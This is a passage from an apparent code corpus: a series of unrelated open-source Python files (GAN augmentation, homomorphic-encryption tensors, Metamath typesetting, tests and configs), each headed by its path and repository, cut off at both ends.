self.out = self.generate_tree(self.Y)
#print('out=', self.out)
return self.out
def _rewind(self):
pass
def output(self):
return str(self.out)
def generate_tree(self, truth):
if self.depth > self.max_depth:
return None
self.count += 1
if self.count >= self.horizon(): return None
# predict node type
self.gold_act = self.NODE_DICT if isinstance(truth, dict) else \
self.NODE_LIST if isinstance(truth, list) else \
self.NODE_ITEM if isinstance(truth, int) else \
None
self.actions = self.actions_node_type
#print('generate_tree:', self.depth, self.gold_act)
node_type = self.policy(self)
# generate corresponding type
truth = None if (node_type != self.gold_act) else truth
if node_type == self.NODE_ITEM:
self.count += 1
if self.count >= self.horizon(): return None
self.actions = self.actions_string
self.gold_act = None if truth is None else (truth + 5)
return self.policy(self) - 5
else:
self.depth += 1
res = self.generate_sequence(node_type == self.NODE_DICT, truth)
self.depth -= 1
return res
def generate_sequence(self, is_dict, truth=None):
res = {} if is_dict else []
#print('generate_sequence:', is_dict, truth)
true_keys = None if truth is None or not is_dict else sorted(truth.keys())
for ii in range(self.max_length):
self.count += 1
if self.count >= self.horizon(): break
self.actions = self.actions_stop
self.gold_act = None if truth is None else \
3 if ii == len(truth) else \
4
stop = self.policy(self)
if stop == 3:
break
# if we're generating a dict, we need a key
if is_dict:
self.count += 1
if self.count >= self.horizon(): break
self.actions = self.actions_key
self.gold_act = None if truth is None or ii >= len(true_keys) else \
(true_keys[ii] + 5 + self.n_ident)
key = self.policy(self) - 5 - self.n_ident
# for both lists and dicts we need a value
ii_key = key if is_dict else ii
true_item = None if truth is None else \
truth[ii] if (not is_dict and ii < len(truth)) else \
truth[true_keys[ii]] if (is_dict and ii < len(true_keys) and true_keys[ii] in truth) else \
None
tree = self.generate_tree(true_item)
if is_dict:
res[key] = tree
else:
res.append(tree)
return res
class JSONTreeFollower(macarico.Reference):
def __init__(self):
macarico.Reference.__init__(self)
def __call__(self, state):
assert state.gold_act is not None
assert state.gold_act in state.actions, \
str((state.gold_act, state.actions))
#print('ref', state.gold_act, state.actions)
return state.gold_act
class TreeEditDistance(macarico.Loss):
corpus_level = False
def __init__(self):
super(TreeEditDistance, self).__init__('ted')
def evaluate(self, example):
if example.Y is None: return 999
t_true = self.tree_to_zss(example.Y)
t_pred = self.tree_to_zss(example.Yhat)
return zss.simple_distance(t_true, t_pred)
def tree_to_zss(self, t):
if isinstance(t, int):
return zss.Node(str(t))
elif isinstance(t, list):
node = zss.Node('**LIST**')
for c in t:
node.addkid(self.tree_to_zss(c))
return node
elif isinstance(t, dict):
node = zss.Node('**DICT**')
for k in sorted(t.keys()):
child = zss.Node(k, [self.tree_to_zss(t[k])])
node.addkid(child)
return node
elif t is None:
return zss.Node('**NONE**')
assert False, "don't know what to do with %s" % t
|
tests/test_basic.py
|
mubashshirjamal/code
| 1,582 |
103928
|
import os
import shutil
from vilya.libs.permdir import get_repo_root
from vilya.models.project import CodeDoubanProject
from tests.base import TestCase
class TestBasic(TestCase):
def test_create_git_repo(self):
git_path = os.path.join(get_repo_root(), 'abc.git')
CodeDoubanProject.create_git_repo(git_path)
assert os.path.exists(git_path)
info_file = os.path.join(git_path, 'refs')
assert os.path.exists(info_file)
shutil.rmtree(git_path)
|
imaginaire/utils/diff_aug.py
|
hw07216/imaginaire
| 3,308 |
103958
|
<reponame>hw07216/imaginaire
# Copyright (C) 2021 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# This work is made available under the Nvidia Source Code License-NC.
# To view a copy of this license, check out LICENSE.md
# Differentiable Augmentation for Data-Efficient GAN Training
# <NAME>, <NAME>, <NAME>, <NAME>, and <NAME>
# https://arxiv.org/pdf/2006.10738
# Modified from https://github.com/mit-han-lab/data-efficient-gans
import torch
import torch.nn.functional as F
def apply_diff_aug(data, keys, aug_policy, inplace=False, **kwargs):
r"""Applies differentiable augmentation.
Args:
data (dict): Input data.
keys (list of str): Keys to the data values that we want to apply
differentiable augmentation to.
aug_policy (str): Type of augmentation(s), ``'color'``,
``'translation'``, or ``'cutout'`` separated by ``','``.
"""
if aug_policy == '':
return data
data_aug = data if inplace else {}
for key, value in data.items():
if key in keys:
data_aug[key] = diff_aug(data[key], aug_policy, **kwargs)
else:
data_aug[key] = data[key]
return data_aug
def diff_aug(x, policy='', channels_first=True, **kwargs):
if policy:
if not channels_first:
x = x.permute(0, 3, 1, 2)
for p in policy.split(','):
for f in AUGMENT_FNS[p]:
x = f(x, **kwargs)
if not channels_first:
x = x.permute(0, 2, 3, 1)
x = x.contiguous()
return x
def rand_brightness(x, **kwargs):
x = x + (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype,
device=x.device) - 0.5)
return x
def rand_saturation(x, **kwargs):
x_mean = x.mean(dim=1, keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype,
device=x.device) * 2) + x_mean
return x
def rand_contrast(x, **kwargs):
x_mean = x.mean(dim=[1, 2, 3], keepdim=True)
x = (x - x_mean) * (torch.rand(x.size(0), 1, 1, 1, dtype=x.dtype,
device=x.device) + 0.5) + x_mean
return x
def rand_translation(x, ratio=0.125, **kwargs):
shift_x, shift_y = int(x.size(2) * ratio + 0.5), int(
x.size(3) * ratio + 0.5)
translation_x = torch.randint(-shift_x, shift_x + 1, size=[x.size(0), 1, 1],
device=x.device)
translation_y = torch.randint(-shift_y, shift_y + 1, size=[x.size(0), 1, 1],
device=x.device)
# noinspection PyTypeChecker
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(x.size(2), dtype=torch.long, device=x.device),
torch.arange(x.size(3), dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + translation_x + 1, 0, x.size(2) + 1)
grid_y = torch.clamp(grid_y + translation_y + 1, 0, x.size(3) + 1)
x_pad = F.pad(x, [1, 1, 1, 1, 0, 0, 0, 0])
x = x_pad.permute(0, 2, 3, 1).contiguous()[
grid_batch, grid_x, grid_y].permute(0, 3, 1, 2)
return x
def rand_cutout(x, ratio=0.5, **kwargs):
cutout_size = int(x.size(2) * ratio + 0.5), int(x.size(3) * ratio + 0.5)
offset_x = torch.randint(0, x.size(2) + (1 - cutout_size[0] % 2),
size=[x.size(0), 1, 1], device=x.device)
offset_y = torch.randint(0, x.size(3) + (1 - cutout_size[1] % 2),
size=[x.size(0), 1, 1], device=x.device)
# noinspection PyTypeChecker
grid_batch, grid_x, grid_y = torch.meshgrid(
torch.arange(x.size(0), dtype=torch.long, device=x.device),
torch.arange(cutout_size[0], dtype=torch.long, device=x.device),
torch.arange(cutout_size[1], dtype=torch.long, device=x.device),
)
grid_x = torch.clamp(grid_x + offset_x - cutout_size[0] // 2, min=0,
max=x.size(2) - 1)
grid_y = torch.clamp(grid_y + offset_y - cutout_size[1] // 2, min=0,
max=x.size(3) - 1)
mask = torch.ones(x.size(0), x.size(2), x.size(3),
dtype=x.dtype, device=x.device)
mask[grid_batch, grid_x, grid_y] = 0
x = x * mask.unsqueeze(1)
return x
def rand_translation_scale(x, trans_r=0.125, scale_r=0.125,
mode='bilinear', padding_mode='reflection',
**kwargs):
assert x.dim() == 4, "Input must be a 4D tensor."
batch_size = x.size(0)
# Identity transformation.
theta = torch.eye(2, 3, device=x.device).unsqueeze(0).repeat(
batch_size, 1, 1)
# Translation, uniformly sampled from (-trans_r, trans_r).
translate = \
2 * trans_r * torch.rand(batch_size, 2, device=x.device) - trans_r
theta[:, :, 2] += translate
# Scaling, uniformly sampled from (1-scale_r, 1+scale_r).
scale = \
2 * scale_r * torch.rand(batch_size, 2, device=x.device) - scale_r
theta[:, :, :2] += torch.diag_embed(scale)
grid = F.affine_grid(theta, x.size())
x = F.grid_sample(
x.float(), grid.float(), mode=mode, padding_mode=padding_mode)
return x
AUGMENT_FNS = {
'color': [rand_brightness, rand_saturation, rand_contrast],
'translation': [rand_translation],
'translation_scale': [rand_translation_scale],
'cutout': [rand_cutout],
}
|
scripts/typeset.py
|
TjWhale/set.mm
| 153 |
104033
|
<gh_stars>100-1000
#!/bin/python
# Process a file's `...` instructions using an mmfile's typographical commands
# Reads from stdin and sends to stdout. By default the mmfile is "set.mm".
# Use the "--help" option to see all the options.
# Sample usage:
# python scripts/typeset.py --html < demo.html.raw > demo.html
# Copyright 2018, <NAME>
# SPDX-License-Identifier: MIT
# Use Python 3 print() syntax, even if we run this in Python 2.
from __future__ import print_function
import sys
import re
import fileinput
import argparse
# Force hashes to be sorted by insertion order, so --list is easy.
# All hashes do this on Python 3.7+, but we want it to happen
# in Python 2.7+ as well. Using OrderedDict makes it work in all cases.
from collections import OrderedDict
# TODO: Currently each `...` must not cross lines.
# TODO: Currently this doesn't handle 'no space if followed by punctuation'.
# Apply typographical definitions in MMFILE which look like this:
# htmldef "(" as "<IMG SRC='lp.gif' WIDTH=5 HEIGHT=19 ALT=' (' TITLE='('>";
# We read in the typographical instructions using a simple
# recursive descent parser, then translate what is in `...`.
# Default options
required_start = 'althtmldef '
mmfile = 'set.mm'
# We read typo definitions from typo_file.
typo_file = None
# "remains" is what's left to read on this line from typo_file
remains = ''
# This is the set of definitions we read from typo_file.
# Each key can be in `...`; the corresponding values are their translations.
typo_definition = OrderedDict()
def read_fill_line():
'''
Clear out leading space, and if current line is empty, read next line
from typo_file into "remains". Returns '' when at end of file.
'''
global remains
remains = remains.lstrip()
if remains == '':
remains = typo_file.readline()
if remains == '': return # File done
read_fill_line() # Recurse until we find something
def read_comment():
'''Skip through a /* ... */ comment'''
global remains
while '*/' not in remains:
remains = ''
read_fill_line()
comment, junk, remains = remains.partition('*/')
def read_required(value):
'''Read a required symbol; error out if it is not there'''
global remains
read_fill_line()
if not remains.startswith(value):
raise 0
remains = remains[len(value):]
read_fill_line()
def read_string():
'''Read a typograhical string, which may continue using +'''
global remains
read_fill_line()
if remains == '':
return result # EOF
elif remains[0] == '"' or remains[0] == "'":
result, junk, remains = remains[1:].partition(remains[0])
read_fill_line()
# Recurse if we have +
if remains and remains[0] == '+':
read_required('+')
return result + read_string()
return result
elif remains.startswith('/*'):
# This presumes /*..*/ comments stay on one line
comment, junk, remains = remains.partition('*/')
return read_string()
else:
raise 0 # BOGUS
def read_definition():
'''Read in a definition from typo_file given remains'''
symbol = read_string()
read_required('as')
result = read_string()
read_required(';')
typo_definition[symbol] = result # Set definition in typo_definition.
def read_definitions():
'''Read all definitions from typo_file'''
global typo_file
global remains
typo_file = open(mmfile)
while True:
read_fill_line()
if remains == '': break # We have reached end of file.
stripped = remains.lstrip()
if stripped.startswith('/*'): # Skip comments
if '*/' in stripped:
comment, junk, remains = remains.partition('*/')
else:
read_comment()
if stripped.startswith(required_start): # Found our definition?
remains = stripped[len(required_start):]
read_definition()
else:
remains = '' # clear out line so we'll read next one
# This searches for backquoted text in a line.
backquoted = re.compile(r'(?:^|(?<= ))` +(([^`]|``)*) +`(?=$| )')
def replace_typographically(m):
'''
Given a match item, return string;
each word is replaced using typo_definition.
If something isn't in the list, return the original list surrounded
by backquotes (presumably we weren't supposed to get this).
'''
inner = m.group(1) # The text to change
translated_list = list(map(lambda i: typo_definition.get(i, None),
inner.split()))
if None in translated_list:
return '` ' + inner + ' `' # Return untransformed version
else:
translation = ' '.join(translated_list)
return translation.strip()
# Set up option handling
my_parser = argparse.ArgumentParser()
my_parser.add_argument('--html', help='Use older HTML format',
action="store_true")
my_parser.add_argument('--althtml', help='Use ALTHTML format (default)',
action="store_true")
my_parser.add_argument('--latex', help='Use LaTex format',
action="store_true")
my_parser.add_argument('--mmfile', help='Use this mmfile (default set.mm)')
my_parser.add_argument('--list',
help='List symbols and their results (in tab separated value format). ' +
'This is sorted in $t order (this may differ from $c declaration order)',
action="store_true")
args = my_parser.parse_args()
# Handle command-line options
if args.html:
required_start = 'htmldef '
if args.althtml:
required_start = 'althtmldef '
if args.latex:
required_start = 'latexdef '
if args.mmfile:
mmfile = args.mmfile
# Read in the typographic definitions.
read_definitions()
# print(typo_definition)
if args.list:
print('symbol\ttranslation')
for sym, translation in typo_definition.items():
print('{}\t{}'.format(sym, translation))
sys.exit(0)
# Now translate stdin using those definitions.
for line in sys.stdin:
s = backquoted.search(line)
new_line = re.sub(backquoted, replace_typographically, line)
print(new_line, end='')
|
nncf/torch/tensor_statistics/reduction.py
|
MaximProshin/nncf
| 136 |
104037
|
"""
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import List, Tuple
import torch
import numpy as np
def max_reduce_like(input_: torch.Tensor, ref_tensor_shape: List[int]) -> torch.Tensor:
numel = np.prod(ref_tensor_shape)
if numel == 1:
retval = input_.max()
for _ in ref_tensor_shape:
retval.unsqueeze_(-1)
return retval
tmp_max = input_
for dim_idx, dim in enumerate(ref_tensor_shape):
if dim == 1:
tmp_max, _ = torch.max(tmp_max, dim_idx, keepdim=True)
return tmp_max
def min_reduce_like(input_: torch.Tensor, ref_tensor_shape: List[int]):
numel = np.prod(ref_tensor_shape)
if numel == 1:
retval = input_.min()
for _ in ref_tensor_shape:
retval.unsqueeze_(-1)
return retval
tmp_min = input_
for dim_idx, dim in enumerate(ref_tensor_shape):
if dim == 1:
tmp_min, _ = torch.min(tmp_min, dim_idx, keepdim=True)
return tmp_min
def get_channel_count_and_dim_idx(scale_shape: List[int]) -> Tuple[int, int]:
channel_dim_idx = 0
channel_count = 1
for dim_idx, dim in enumerate(scale_shape):
if dim != 1:
channel_dim_idx = dim_idx
channel_count = dim
return channel_count, channel_dim_idx
def expand_like(input_: torch.Tensor, scale_shape: List[int]) -> torch.Tensor:
retval = input_
count, idx = get_channel_count_and_dim_idx(scale_shape)
assert input_.numel() == count
assert len(input_.size()) == 1
for _ in range(0, idx):
retval = retval.unsqueeze(0)
for _ in range(idx + 1, len(scale_shape)):
retval = retval.unsqueeze(-1)
return retval
|
tests/features/steps/all.py
|
jaimegildesagredo/finch
| 118 |
104038
|
<filename>tests/features/steps/all.py
# -*- coding: utf-8 -*-
from behave import when, then
from tornado import ioloop
@when(u'I get all the users')
def impl(context):
def on_users(users, error):
ioloop.IOLoop.instance().stop()
context.users = users
context.error = error
context.collection.all(on_users)
ioloop.IOLoop.instance().start()
assert not context.error
@then(u'I should have a list of users')
def impl(context):
assert isinstance(context.users, list)
assert isinstance(context.users[0], context.collection.model)
|
codigo/Live148/app/database.py
|
cassiasamp/live-de-python
| 572 |
104039
|
<filename>codigo/Live148/app/database.py
import databases
import sqlalchemy
from starlette.config import Config
config = Config(".env")
TESTING = config("TESTING", cast=bool, default=False)
DATABASE_URL = config("DATABASE_URL", cast=databases.DatabaseURL)
TEST_DATABASE_URL = DATABASE_URL.replace(
database="test_" + DATABASE_URL.database
)
if TESTING:
database = databases.Database(TEST_DATABASE_URL, force_rollback=True)
else:
database = databases.Database(DATABASE_URL)
metadata = sqlalchemy.MetaData()
|
configs/_base_/backends/tensorrt-fp16.py
|
zhiqwang/mmdeploy
| 746 |
104064
|
<filename>configs/_base_/backends/tensorrt-fp16.py
backend_config = dict(
type='tensorrt', common_config=dict(fp16_mode=True, max_workspace_size=0))
|
tenseal/tensors/abstract_tensor.py
|
rand0musername/TenSEAL
| 410 |
104092
|
<reponame>rand0musername/TenSEAL
"""Abstract tensor class that implements common tensor methods"""
from typing import List, Union
import tenseal as ts
from abc import ABC
class AbstractTensor(ABC):
@property
def data(self):
"""Get the wrapped low level tensor object"""
return self._data
@data.setter
def data(self, value):
"""Set the wrapped low level tensor object"""
native_type = getattr(ts._ts_cpp, self.__class__.__name__)
if not isinstance(value, native_type):
raise TypeError(f"value must be of type {native_type}")
self._data = value
def copy(self):
return self._wrap(data=self.data.copy())
def __copy__(self):
return self.copy()
def context(self) -> "ts.Context":
"""Get the context linked to this tensor"""
return ts.Context._wrap(self.data.context())
def link_context(self, ctx: "ts.Context"):
"""Set the context linked to this tensor"""
return self.data.link_context(ctx.data)
@property
def shape(self) -> List[int]:
return self.data.shape()
@classmethod
def load(cls, context: "ts.Context", data: bytes) -> "AbstractTensor":
"""
Constructor method for the tensor object from a serialized protobuffer.
Args:
context: a context, holding the encryption parameters and keys.
data: the serialized protobuffer.
Returns:
Tensor object.
"""
if isinstance(context, ts.Context) and isinstance(data, bytes):
native_type = getattr(ts._ts_cpp, cls.__name__)
return cls._wrap(native_type(context.data, data))
raise TypeError(
"Invalid input types context: {} and vector: {}".format(type(context), type(data))
)
@classmethod
def lazy_load(cls, data: bytes) -> "AbstractTensor":
"""
Constructor method for the tensor object from a serialized protobuffer, without a context.
Args:
data: the serialized protobuffer.
Returns:
Tensor object.
"""
if isinstance(data, bytes):
native_type = getattr(ts._ts_cpp, cls.__name__)
return cls._wrap(native_type(data))
raise TypeError("Invalid input types vector: {}".format(type(data)))
def serialize(self) -> bytes:
"""Serialize the tensor into a stream of bytes"""
return self.data.serialize()
@classmethod
def _wrap(cls, data) -> "AbstractTensor":
"""Return a new tensor object wrapping the low level tensor object"""
return cls(data=data)
def _decrypt(
self, secret_key: "ts.enc_context.SecretKey" = None
) -> Union[ts._ts_cpp.PlainTensorDouble, ts._ts_cpp.PlainTensorInt64, List[float], List[int]]:
if secret_key is None:
return self.data.decrypt()
elif isinstance(secret_key, ts.enc_context.SecretKey):
return self.data.decrypt(secret_key.data)
else:
raise TypeError(f"incorrect type: {type(secret_key)} != SecretKey")
@classmethod
def _get_operand(cls, other, dtype: str = "float") -> Union[int, float, "ts._ts_cpp.Tensor"]:
"""Extract the appropriate operand the tensor can operate with"""
if isinstance(other, (int, float)):
return other
elif isinstance(other, (cls, ts.PlainTensor)):
return other.data
else:
try:
other = ts.plain_tensor(other, dtype=dtype)
other = other.data
except TypeError:
raise TypeError(f"can't operate with object of type {type(other)}")
return other
def __add__(self, other) -> "AbstractTensor":
return self.add(other)
def __iadd__(self, other) -> "AbstractTensor":
return self.add_(other)
def __radd__(self, other) -> "AbstractTensor":
return self.add(other)
def __mul__(self, other) -> "AbstractTensor":
return self.mul(other)
def __imul__(self, other) -> "AbstractTensor":
return self.mul_(other)
def __rmul__(self, other) -> "AbstractTensor":
return self.mul(other)
def __sub__(self, other) -> "AbstractTensor":
return self.sub(other)
def __isub__(self, other) -> "AbstractTensor":
return self.sub_(other)
def __rsub__(self, other) -> "AbstractTensor":
copy = self.copy()
copy.neg_()
copy.add_(other)
return copy
def __pow__(self, power) -> "AbstractTensor":
return self.pow(power)
def __ipow__(self, power) -> "AbstractTensor":
return self.pow_(power)
def __neg__(self) -> "AbstractTensor":
return self.neg()
def neg(self) -> "AbstractTensor":
return self._wrap(self.data.neg())
def neg_(self) -> "AbstractTensor":
self.data.neg_()
return self
def sum(self, axis=0) -> "AbstractTensor":
return self._wrap(self.data.sum(axis))
def sum_(self, axis=0) -> "AbstractTensor":
self.data.sum_(axis)
return self
def square(self) -> "AbstractTensor":
return self._wrap(self.data.square())
def square_(self) -> "AbstractTensor":
self.data.square_()
return self
def pow(self, power) -> "AbstractTensor":
return self._wrap(self.data.pow(power))
def pow_(self, power) -> "AbstractTensor":
self.data.pow_(power)
return self
def polyval(self, coefficients: Union[List[float], List[int]]) -> "AbstractTensor":
"""Evaluate polynomial
`coefficients[0] + coefficients[1] * self + .... coefficients[n] * self ^ n`
"""
return self._wrap(self.data.polyval(coefficients))
def polyval_(self, coefficients: Union[List[float], List[int]]) -> "AbstractTensor":
self.data.polyval_(coefficients)
return self
|
lib/python/frugal/tornado/transport/transport.py
|
ariasheets-wk/frugal
| 144 |
104196
|
# Copyright 2017 Workiva
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tornado import gen
from frugal.transport import FTransport
class FTransportBase(FTransport):
"""
FTransportBase extends FTransport using the coroutine decorators used by
all tornado FTransports.
"""
def is_open(self):
raise NotImplementedError("You must override this.")
@gen.coroutine
def open(self):
raise NotImplementedError("You must override this.")
@gen.coroutine
def close(self):
raise NotImplementedError("You must override this.")
@gen.coroutine
def oneway(self, context, payload):
raise NotImplementedError('You must override this.')
@gen.coroutine
def request(self, context, payload):
raise NotImplementedError('You must override this.')
|
gdn-master/lib/psa/modules/__init__.py
|
ldrunning/segmentation
| 1,137 |
104228
|
<reponame>ldrunning/segmentation<filename>gdn-master/lib/psa/modules/__init__.py<gh_stars>1000+
from .psamask import *
|
tests/bench/arrayop-4-bytearray_map.py
|
learnforpractice/micropython-cpp
| 692 |
104295
|
# Array operation
# Type: list, map() call. This method requires allocation of
# the same amount of memory as original array (to hold result
# array). On the other hand, input array stays intact.
import bench
def test(num):
for i in iter(range(num//10000)):
arr = bytearray(b"\0" * 1000)
arr2 = bytearray(map(lambda x: x + 1, arr))
bench.run(test)
|
test/strings/prefixes2.py
|
kylebarron/MagicPython
| 1,482 |
104307
|
<gh_stars>1000+
a = U'S T R'
a = B'S T R'
a = R'S T R'
a = BR'S T R'
a = RB'S T R'
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
U : source.python, storage.type.string.python, string.quoted.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.single.python
S T R : source.python, string.quoted.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
B : source.python, storage.type.string.python, string.quoted.binary.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.binary.single.python
S T R : source.python, string.quoted.binary.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.binary.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
R : source.python, storage.type.string.python, string.quoted.raw.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.single.python
S T R : source.python, string.quoted.raw.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.raw.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
BR : source.python, storage.type.string.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.binary.single.python
S T R : source.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.raw.binary.single.python
a : source.python
: source.python
= : keyword.operator.assignment.python, source.python
: source.python
RB : source.python, storage.type.string.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.begin.python, source.python, string.quoted.raw.binary.single.python
S T R : source.python, string.quoted.raw.binary.single.python
' : punctuation.definition.string.end.python, source.python, string.quoted.raw.binary.single.python
|
eppy/tests/geometry_tests/test_area_zone.py
|
hnagda/eppy
| 116 |
104366
|
# Copyright (c) 2012 <NAME>
# =======================================================================
# Distributed under the MIT License.
# (See accompanying file LICENSE or copy at
# http://opensource.org/licenses/MIT)
# =======================================================================
""" pytest for area_zone.py"""
# Wrote by <NAME> <EMAIL> / <EMAIL>
# School of Architecture, University of Hawaii at Manoa
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import eppy.geometry.area_zone as area_zone
from eppy.pytest_helpers import almostequal
def test_area():
"""test for area of a zone"""
data = (
([(0, 0, 0), (1, 0, 1), (1, 1, 0), (0, 1, 1)], 1), # polygon, answer,
([(0, 0, 0), (1, 0, 0), (1, 0, 1), (0, 0, 1)], 0),
([(0, 0, 0), (0, 1, 0), (0, 1, 1), (0, 0, 1)], 0),
([(0, 0, 4), (5, 0, 4), (5, 5, 6), (0, 5, 6)], 25),
)
for poly, answer in data:
result = area_zone.area(poly)
assert almostequal(answer, result, places=4) == True
|
CommonTools/RecoAlgos/python/LargestEtCaloJetSelector_cfi.py
|
ckamtsikis/cmssw
| 852 |
104402
|
<reponame>ckamtsikis/cmssw
import FWCore.ParameterSet.Config as cms
hltSelector4Jets = cms.EDFilter( "LargestEtCaloJetSelector",
src = cms.InputTag( "hltMCJetCorJetIcone5" ),
filter = cms.bool( False ),
maxNumber = cms.uint32( 4 )
)
|
run.py
|
0xflotus/sandman2
| 1,899 |
104420
|
<gh_stars>1000+
from sandman2 import get_app
app = get_app('sqlite+pysqlite:///tests/data/db.sqlite3')
def main():
app.run(debug=True)
if __name__ == '__main__':
main()
|
utils_cv/detection/mask.py
|
muminkoykiran/computervision-recipes
| 7,899 |
104432
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import numpy as np
from PIL import Image
from pathlib import Path
from typing import Tuple, Union
def binarise_mask(mask: Union[np.ndarray, str, Path]) -> np.ndarray:
""" Split the mask into a set of binary masks.
Assume the mask is already binary masks of [N, Height, Width], or
grayscale mask of [Height, Width] with different values
representing different objects, 0 as background.
"""
# get numpy array from image file
if isinstance(mask, (str, Path)):
mask = np.array(Image.open(mask))
# convert to numpy array
mask = np.asarray(mask)
# if it is a boolean array, consider it's already binarised
if mask.ndim == 3:
assert np.issubdtype(mask.dtype, np.bool), "'mask' should be binary."
return mask
assert mask.ndim == 2, "'mask' should have at least 2 channels."
# remove background
obj_values = np.unique(mask)[1:]
# get the binary masks for each color (instance)
binary_masks = mask == obj_values[:, None, None]
return binary_masks
def colorise_binary_mask(
binary_mask: np.ndarray, color: Tuple[int, int, int] = (2, 166, 101)
) -> np.ndarray:
""" Set the color for the instance in the mask. """
# create empty RGB channels
h = binary_mask.shape[0]
w = binary_mask.shape[1]
r, g, b = np.zeros([3, h, w]).astype(np.uint8)
# set corresponding color for each channel
r[binary_mask], g[binary_mask], b[binary_mask] = color
# merge RGB channels
colored_mask = np.dstack([r, g, b])
return colored_mask
def transparentise_mask(
colored_mask: np.ndarray, alpha: float = 0.5
) -> np.ndarray:
""" Return a mask with fully transparent background and alpha-transparent
instances.
Assume channel is the third dimension of mask, and no alpha channel.
"""
assert (
colored_mask.shape[2] == 3
), "'colored_mask' should be of 3-channels RGB."
# convert (0, 0, 0) to (0, 0, 0, 0) and
# all other (x, y, z) to (x, y, z, alpha*255)
binary_mask = (colored_mask != 0).any(axis=2)
alpha_mask = (alpha * 255 * binary_mask).astype(np.uint8)
return np.dstack([colored_mask, alpha_mask])
def merge_binary_masks(binary_masks: np.ndarray) -> np.ndarray:
""" Merge binary masks into one grayscale mask.
Assume binary_masks is of [N, Height, Width].
"""
obj_values = np.arange(len(binary_masks)) + 1
# label mask from 1 to number of instances
labeled_masks = binary_masks * obj_values[:, None, None]
return np.max(labeled_masks, axis=0).astype(np.uint8)
|
aries_cloudagent/protocols/issue_credential/v2_0/models/detail/tests/test_indy.py
|
kuraakhilesh8230/aries-cloudagent-python
| 247 |
104449
|
<reponame>kuraakhilesh8230/aries-cloudagent-python
from asynctest import TestCase as AsyncTestCase
from ..indy import V20CredExRecordIndy
class TestV20CredExRecordIndy(AsyncTestCase):
async def test_record(self):
same = [
V20CredExRecordIndy(
cred_ex_indy_id="dummy-0",
cred_ex_id="abc",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id=None,
cred_rev_id=None,
)
] * 2
diff = [
V20CredExRecordIndy(
cred_ex_indy_id="dummy-1",
cred_ex_id="def",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id=None,
cred_rev_id=None,
),
V20CredExRecordIndy(
cred_ex_indy_id="dummy-1",
cred_ex_id="ghi",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id=None,
cred_rev_id=None,
),
V20CredExRecordIndy(
cred_ex_indy_id="dummy-1",
cred_ex_id="def",
cred_request_metadata={"a": 1, "b": 2},
rev_reg_id="rev-reg-id",
cred_rev_id="cred-rev-id",
),
]
for i in range(len(same) - 1):
for j in range(i, len(same)):
assert same[i] == same[j]
for i in range(len(diff) - 1):
for j in range(i, len(diff)):
assert diff[i] == diff[j] if i == j else diff[i] != diff[j]
assert same[0].cred_ex_indy_id == "dummy-0"
|
alipay/aop/api/response/AlipayOverseasTravelRateCurrencyBatchqueryResponse.py
|
antopen/alipay-sdk-python-all
| 213 |
104469
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.RateCurrency import RateCurrency
class AlipayOverseasTravelRateCurrencyBatchqueryResponse(AlipayResponse):
def __init__(self):
super(AlipayOverseasTravelRateCurrencyBatchqueryResponse, self).__init__()
self._currency_list = None
@property
def currency_list(self):
return self._currency_list
@currency_list.setter
def currency_list(self, value):
if isinstance(value, list):
self._currency_list = list()
for i in value:
if isinstance(i, RateCurrency):
self._currency_list.append(i)
else:
self._currency_list.append(RateCurrency.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(AlipayOverseasTravelRateCurrencyBatchqueryResponse, self).parse_response_content(response_content)
if 'currency_list' in response:
self.currency_list = response['currency_list']
|
tests/utils/harness.py
|
wx-b/cockpit
| 367 |
104543
|
<reponame>wx-b/cockpit<gh_stars>100-1000
"""Base class for executing and hooking into a training loop to execute checks."""
from backpack import extend
from cockpit import Cockpit
from tests.utils.rand import restore_rng_state
class SimpleTestHarness:
"""Class for running a simple test loop with the Cockpit.
Args:
problem (string): The (instantiated) problem to test on.
"""
def __init__(self, problem):
"""Store the instantiated problem."""
self.problem = problem
def test(self, cockpit_kwargs, *backpack_exts):
"""Run the test loop.
Args:
cockpit_kwargs (dict): Arguments for the cockpit.
*backpack_exts (list): List of user-defined BackPACK extensions.
"""
problem = self.problem
data = problem.data
device = problem.device
iterations = problem.iterations
# Extend
